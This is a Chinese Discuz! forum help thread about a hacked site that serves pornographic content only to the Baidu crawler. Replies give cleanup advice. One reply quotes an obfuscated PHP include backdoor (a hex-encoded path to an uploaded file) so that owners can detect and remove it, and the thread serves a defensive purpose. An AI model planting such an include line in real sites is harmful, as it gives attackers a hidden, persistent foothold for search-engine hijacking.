Discuz!应用商城(DisMall)Discuz!应用商城(DisMall)

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
热搜: 活动 交友 discuz
查看: 2146|回复: 14

[求助] 网站疑似被挂马了 怎么办?

[复制链接]

15

主题

42

帖子

51

积分

Member

Rank: 2Rank: 2

贡献
0 点
金币
6 个
发表于 2020-9-10 09:20:12 | 显示全部楼层 |阅读模式
网址    /forum.php?BMID=187808263.pptx
正常访问 内容没问题
但是使用360 魔变 模拟  百度蜘蛛 访问 就是 色情内容了。   怎么办?
回复

使用道具 举报

18

主题

930

帖子

1208

积分

开发者

Rank: 6Rank: 6Rank: 6

贡献
7 点
金币
210 个
QQ
发表于 2020-9-11 01:19:48 | 显示全部楼层
官方文件恢复下 未知文件备份后清理掉 作下服务器安全
回复 支持 反对

使用道具 举报

81

主题

2858

帖子

3395

积分

Forum Legend

Rank: 6Rank: 6Rank: 6

贡献
8 点
金币
273 个
发表于 2020-9-11 01:55:41 | 显示全部楼层
若存在,处理前,先卸载所有盗版插件与模版。

进discuz后台找到工具-文件校验,看下最近有哪些php文件被修改了。

1、排查网站源文件的php 文件,查看是否有出现IP地址、或者异常网站(上面跳转的网站),如果有删除就可以了。

2、排查网站源文件的php 文件,查看是否有如下代码:@include($_SERVER['DOCUMENT_ROOT']

(排查一般用WEBshell后门扫描软件扫描核查!)

如果有就删除此段代码。并把该段代码进行解密。

举例:@include($_SERVER['DOCUMENT_ROOT'].PACK('H*','2F646174612F6176617461722F30'));

需要解密的代码为:2F646174612F6176617461722F30

解密后为:/data/avatar/0

代码解密地址:http://www.bejson.com/convert/ox2str/


意思就是在上述路径下存在被非法上传的文件,用于做快照劫持。

解决办法:删除上面的代码和文件即可。

挂马问题解决了后,记得更改服务器相关的各种密码,尽量设置的复杂一点。
回复 支持 反对

使用道具 举报

0

主题

51

帖子

80

积分

开发者

Rank: 6Rank: 6Rank: 6

贡献
0 点
金币
5 个
QQ
发表于 2020-9-11 08:27:53 | 显示全部楼层
可以协助清理木马病毒q276440802
回复 支持 反对

使用道具 举报

5

主题

317

帖子

478

积分

开发者

Discuz! 运维技术

Rank: 6Rank: 6Rank: 6

贡献
1 点
金币
123 个
QQ
发表于 2020-9-11 09:19:59 | 显示全部楼层
可以协助处理木马病毒 Q475305268
回复 支持 反对

使用道具 举报

cbx

1

主题

3

帖子

3

积分

Newbie

Rank: 1

贡献
0 点
金币
0 个
发表于 2020-9-11 16:07:32 | 显示全部楼层
我之前也是被这个困扰几个月,后来用最土的方法,删除uc_server目录的,admin.php和index.php文件,需要用到的时候,再上传。就没有再被挂过马了。
回复 支持 反对

使用道具 举报

49

主题

239

帖子

269

积分

Conqueror

Rank: 3Rank: 3Rank: 3

贡献
0 点
金币
19 个
发表于 2020-9-13 17:12:40 | 显示全部楼层
好佳芯科技 发表于 2020-9-11 08:27
可以协助清理木马病毒q276440802

如果有马什么价格?
大渝传奇论坛https://www.cqtieba.com
回复 支持 反对

使用道具 举报

49

主题

239

帖子

269

积分

Conqueror

Rank: 3Rank: 3Rank: 3

贡献
0 点
金币
19 个
发表于 2020-9-13 17:16:30 | 显示全部楼层
allthebest 发表于 2020-9-11 01:55
若存在,处理前,先卸载所有盗版插件与模版。

进discuz后台找到工具-文件校验,看下最近有哪些php文件被 ...

看了一下,整个论坛好像就你一个热心会员了。哎。我的网站最近不知道怎么回事。有时候输入别人的域名也可以访问我的网站。有时候别人的域名又打不开。我担心是不是中马了。护卫神查了一下。把疑是文件替换了。用护卫神再查还是有可疑文件。
大渝传奇论坛https://www.cqtieba.com
回复 支持 反对

使用道具 举报

0

主题

51

帖子

80

积分

开发者

Rank: 6Rank: 6Rank: 6

贡献
0 点
金币
5 个
QQ
发表于 2020-9-13 21:10:02 | 显示全部楼层
可以加我Q276440802,给你排查一下
回复 支持 反对

使用道具 举报

81

主题

2858

帖子

3395

积分

Forum Legend

Rank: 6Rank: 6Rank: 6

贡献
8 点
金币
273 个
发表于 2020-9-14 03:11:25 | 显示全部楼层
fujie1982 发表于 2020-9-13 08:16
看了一下,整个论坛好像就你一个热心会员了。哎。我的网站最近不知道怎么回事。有时候输入别人的域名也可 ...

应用中心插件与模版,安装都不会加入代码到PHP文件;

有时候输入别人的域名也可以访问我的网站:做成这问题,应是别人的域名与你的站点安装有相同插件或模版。

有时候别人的域名又打不开:做成这问题,别人的域名已清理了插件或模版后门。


回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

手机版|小黑屋|Discuz!应用中心 ( 皖ICP备16010102号 )|网站地图star

GMT+8, 2022-5-26 07:20 , Processed in 0.052770 second(s), 21 queries , Yac On.

Powered by Discuz!

Copyright © Tencent Cloud.

快速回复 返回顶部 返回列表